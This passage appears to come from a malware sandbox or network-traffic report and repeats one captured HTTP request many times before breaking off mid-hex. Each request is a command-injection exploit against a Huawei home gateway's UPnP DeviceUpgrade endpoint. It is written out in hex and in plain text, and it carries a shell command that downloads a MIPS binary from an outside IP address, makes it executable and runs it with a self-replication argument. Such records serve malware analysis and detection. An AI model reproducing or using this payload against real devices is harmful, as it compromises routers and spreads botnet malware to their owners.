64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 